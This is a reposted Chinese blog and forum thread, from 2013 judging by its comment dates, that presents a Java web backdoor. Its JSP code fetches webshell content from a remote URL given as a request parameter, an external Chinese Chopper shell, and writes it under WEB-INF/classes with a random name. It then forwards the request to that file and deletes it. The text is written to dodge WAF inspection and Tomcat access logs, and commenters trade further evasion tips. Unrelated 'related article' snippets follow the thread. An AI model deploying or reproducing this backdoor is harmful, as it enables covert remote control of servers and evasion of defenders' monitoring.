java网站后门审查_JavaWeb随机后门?

news/2024/5/12 13:33:46/文章来源:https://blog.csdn.net/weixin_29964507/article/details/114612912

我的思路是先从远程读取要生成的shell内容,然后把shell藏在WEB-INF下shell的名字和长度也都随机生成。比如:

imgpxy.php?url=gpj.392473551092013102%2F0131_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

不过就算藏在WEB-INF下也会被发现,干脆用一次就删一次?这样不会在任何目录下留下Shell。

imgpxy.php?url=gpj.671144551092013102%2F0131_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

菜刀链接:http://localhost/Demo2/new.jsp?url=http://xsser.me/caidao/css.jsp

String getConnection(String url) {

String result="",line="";

try {

URL realUrl = new URL(url);

URLConnection connection = realUrl.openConnection();

connection.setConnectTimeout(15000);

connection.setReadTimeout(15000);

connection.connect();

BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));

while ((line = in.readLine()) != null) {

result += line;

}

} catch (Exception e) {

e.printStackTrace();

}

return result;

}

void writeShell(String url,String path){

try{

RandomAccessFile rf = new RandomAccessFile(path, "rw");

rf.write(new String(getConnection(url)).getBytes());

rf.close();

}catch(Exception e){

e.printStackTrace();

}

}

String getRandomString(int length) {

String base = "abcdefghijklmnopqrstuvwxyz0123456789";

Random random = new Random();

StringBuffer sb = new StringBuffer();

for (int i = 0; i < length; i++) {

int number = random.nextInt(base.length());

sb.append(base.charAt(number));

}

return sb.toString();

}

String getRequestFile(HttpServletRequest request){

return "/WEB-INF/classes/"+getRandomString(new Random().nextInt(10)+1)+".jsp";

}

%>

String f = getRequestFile(request),p = request.getSession().getServletContext().getRealPath("/")+f;

writeShell(request.getParameter("url"),p);

request.getRequestDispatcher(f).forward(request,response);

new File(p).delete();

%>

测试的时候还发现了一个jspx和jsp的一个小秘密:

用jspx的语法可以直接适用于jsp,也就是说可以把http://xsser.me/caidao/jspx.jspx的内容copy,然后保存到一个jsp文件里面一样可以正常访问。

现在要做的就是怎么去藏生成后门的代码了。

相关吐槽:

1#

yexin | 2013-10-27 14:24

前排留名。

2#

淡漠天空 (路人的世界) | 2013-10-27 14:30

用jspx的语法可以直接适用于jsp,也就是说可以把http://xsser.me/caidao/jspx.jspx的内容copy,然后保存到一个jsp文件里面一样可以正常访问。

这个的确 。。。。。也是不久前发现的

3#

核心白帽子 (发标题党的草泥马) | 2013-10-27 14:36

还不如放一个jsp的一句话上去每次要用的时候上传一个jsp大马 用完了之后将jsp大马删除..

跟你这也没多大区别..看不出这样有什么方便隐藏的优势

4#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-10-27 15:31

@核心白帽子 其实也没什么大的不同,只是记录一下。一点小区别,第一这个后门存在WEB-INF直接请求http://xxx.com/WEB-INF/xxx.jsp请求不到,某些WAF可能不会检查WEB-INF下的jsp。第二accesslog记录。

5#

Coody (&_&) | 2013-10-27 15:56

@园长 accesslog不记录 WEB-INF/ 下的文件访问么?

6#

龙臣 (据说共产党员的老婆更漂亮。) | 2013-10-27 16:02

传错了 忽略之

7#

淡漠天空 (路人的世界) | 2013-10-27 16:18

@园长 国内还好 国外的WEB-INF根本无权限 某些限定环境下是行不通的

8#

淡漠天空 (路人的世界) | 2013-10-27 16:19

WAF的规则决定能不能访问或者动WEB-INF 太局限了。。。

9#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-10-27 17:03

@Coody 请求shell会accesslog会记录下来的完整shell路径请求上面的后门记录的应该是参数。

测试了下Tomcat的Accesslog没有记录getRequestDispatcher forward的地址和参数:

0:0:0:0:0:0:0:1 - - [27/Oct/2013:17:01:42 +0800] "POST /Demo2/new.jsp?url=http://xsser.me/caidao/css.jsp HTTP/1.1" 200 296

10#

wefgod (求大牛指点) | 2013-10-28 08:54

园长之前不是说filter可以?那个好像比较好

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_792714.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

android 壁纸 官方网站,wallsplash - 壁纸从未如此精美 #Android

原标题&#xff1a;wallsplash &#xff0d; 壁纸从未如此精美 #Android壁纸的精美与否&#xff0c;往往直接展现了一个人的审美水准&#xff0c;而今天带来的这款「wallsplash 」则是一款完全遵循 Material Design 设计规范的精美壁纸应用&#xff0c;它是基于网站开发的官方独…

网站服务器如何修复,如何修复linux系统_网站服务器运行维护

win10系统开机时间很长_网站服务器运行维护解决win10系统开机时间很长问题的方法&#xff1a;1、首先打开运行窗口&#xff0c;输入【msconfig】&#xff0c;打开系统配置&#xff1b;2、然后在【常规】选项下&#xff0c;勾选【加载系统服务】与【加载启动项】&#xff1b;3、…

小网站云服务器配置推荐,小网站云服务器配置推荐

小网站云服务器配置推荐 内容精选换一换虚拟IP(Virtual IP Address&#xff0c;简称VIP)是一个未分配给真实弹性云服务器网卡的IP地址。弹性云服务器除了拥有私有IP地址外&#xff0c;还可以拥有虚拟IP地址&#xff0c;用户可以通过其中任意一个IP(私有IP/虚拟IP)访问此弹性云服…

70个大量使用背景图片的精美网站设计

仔细观察&#xff0c;你会发现&#xff0c; 一个花哨的设计基本都大量的使用了背景图片(不用图片还真难花哨起来)&#xff0c;当然&#xff0c;这里的花哨并没有任何贬意&#xff0c;作为一个设计爱好者&#xff0c;尽管我个人偏向于“尽量少的设计“和”网格设计“(其实是因为…

谷歌地图英文版_谷歌seo网站优化如何做到谷歌首页?

大量的平台卖家开始转战独立站&#xff0c;但独立站想在谷歌上获得好的搜索排名&#xff0c;也不是件容易的事。除了投放广告&#xff0c;还要不断优化网站内容。因为谷歌只会推荐认为值得被推荐的网站内容。我们在谷歌上搜索“wholesale dress”&#xff0c;首先展示的是谷歌广…

png文件合并_良心网站!支持文件在线压缩,页面简洁无广告,一秒提高办公效率...

我的平时工作要进行网站更新、自媒体更新、视频更新&#xff08;还有很多记不清了&#xff09;在文章中都需要上传图片&#xff0c;但平台都有文件大小限制&#xff0c;毕竟用户体验是很重要的。那么今天就给大家推荐我最近发现的一个超实用的在线文件压缩网站。悄悄告诉你&…

seo自动发外链_SEO怎样发外链效果好

今天&#xff0c;没有一家企业可以没有自己的线上门户&#xff0c;无论你线下做得多么优秀&#xff0c;你都离不开线上展示你形象的一个窗口&#xff0c;网络营销已经上升为企业战略层面上必选的营销策略&#xff0c;而非可有可无的营销试验田。无论你是一个自学的SEO学生&…

php网站安全狗绕过,网站安全狗最新版绕过测试

测试时间&#xff1a;2014.10.21测试版本&#xff1a;IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29)&#xff0c;均为今天能下到的最新版。用于绕过的核心字符&#xff1a;%0A&#xff0c;某些特殊场合需要和注释符配合使用。测试详细步骤&#xff1a;1、本机安…

网站启用URL重定向后.原本的静态文件打不开的解决方案

最近网站用了重定向.自己总结几个问题.(纯粹写给自己看的) 1.ActionlessForm.cs以重写Form的方式用于处理PostBack回发后URL变为原始地址 web.config的配置 <httpModules> <add type"ruonanxiao.Config.ModuleRewriter, ruonanxiao.Config" name"Mod…

网站配色杂谈

BgcolorΚ″#F1FAFA″———做正文的背景色好&#xff0c;淡雅    BgcolorΚ″#E8FFE8″———做标题的背景色较好    BgcolorΚ″#E8E8FF″———做正文的背景色较好&#xff0c;文字颜色配黑色   BgcolorΚ″#8080C0″———上配白色文字较好    BgcolorΚ″#E8D0…

域名已备案提示你访问的是临时域名_已备案的老域名对于建站有哪些优势?

搭建网站的前提是需要一个域名&#xff0c;那么一个已备案的老域名对于建站都有哪些优势呢&#xff1f;什么叫老域名&#xff1f;顾名思义&#xff0c;就是一个拥有多年建站历史的&#xff0c;由于某种原因域名过期&#xff0c;可供他人抢注的域名。当我们在域名抢注时&#xf…

【特别推荐】10款唯美浪漫的婚礼 结婚纪念网站模板

互联网的重要性不言而喻&#xff0c;如今我们的生活已经完全离不开网络。这里给大家分享一组唯美浪漫的结婚邀请网站以及婚礼请柬网站模板&#xff0c;如果你也正想制作这样的网站&#xff0c;相信这些漂亮的网站模板能够带给你很大的帮助&#xff0c;让你快速创建出自己的网站…

网站收集页---

https://rxjs-dev.firebaseapp.com/guide/overview http://www.ofmonkey.com/front/rem http://validform.club/index.html 做移动端项目多的话&#xff0c;可以看看这个 移动web开发适配秘籍Rem https://www.imooc.com/learn/942 https://rxjs-dev.firebaseapp.com/guide/ov…

将整个网站变灰

2019独角兽企业重金招聘Python工程师标准>>> 为方便站点哀悼&#xff0c;特提供素装代码&#xff0c;以表哀悼。以下为全站CSS代码。 html { filterrogidXImageTransform.Microsoft.BasicImage(grayscale1); } 使用方法&#xff1a;这段代码可以变网页为黑白&#x…

使用BeautifulSoup爬取“0daydown”网站的信息(2)——字符编码问题解决

2019独角兽企业重金招聘Python工程师标准>>> 上篇中的程序实现了抓取0daydown最新的10页信息&#xff0c;输出是直接输出到控制台里面。再次改进代码时我准备把它们写入到一个TXT文档中。这是问题就出来了。 最初我的代码如下&#xff1a; #-*- coding: utf-8 -*- #…

荷露叮咚wp建站系列视频课程.3WordPress功能菜单介绍

安装后的WordPress在E:\xampp\apps\wordpress\htdocs(历史版本有在E:\xampp\htdocs目录下的情况)&#xff0c;将E:\xampp\apps\wordpress\htdocs目录下的wordpress文件夹拷至E:\xampp\htdocs目录也是可以的。 常用功能&#xff08;按常规操作先后顺序&#xff09;&#xff1a; …

利用 squid 反向代理提高网站性能原理总结

2019独角兽企业重金招聘Python工程师标准>>> 本文在介绍 squid 反向代理的工作原理的基础上&#xff0c;指出反向代理技术在提高网站访问速度&#xff0c;增强网站可用性、安全性方面有很好的用途。作者在具体的实验环境下&#xff0c;利用 DNS 轮询和 Squid 反向代…

初创企业如何用SEO打造百度品牌专区

品牌对于企业的重要性不言而喻。为打造品牌而花去的市场费用&#xff0c;占去了公司营销费用的大部分。而作为网络营销中的一个非常有效的渠道&#xff0c;百度也成为多数公司&#xff0c;宣传品牌的一个首选平台。对于创业公司&#xff0c;品牌的宣传需求非常迫切。但“预算少…

IIS服务管理器无法启动网站的解决方法

如图&#xff1a; 启动网站时提示无法启动网站&#xff0c;由于windows Activation Services或者w3svc均未启动。解决方法&#xff1a; 找到World Wide Web Publishing Service服务项&#xff0c;没有启动&#xff0c;右键点击启动。原文地址:http://bbs.delit.cn/thread-742-1…

vba获取正在运行网站的源码_利用运行按钮,从模块(Module)运行代码

窗体是学习VBA人员最为感兴趣的部分&#xff0c;“VBA之EXCEL应用”从简单的录制宏实现一直讲到窗体的搭建&#xff0c;大家可以非常容易的掌握相关的知识&#xff0c;这套教程面向初学人员&#xff0c;共三册&#xff0c;十七章&#xff0c;都是我们在利用EXCEL工作过程中需要…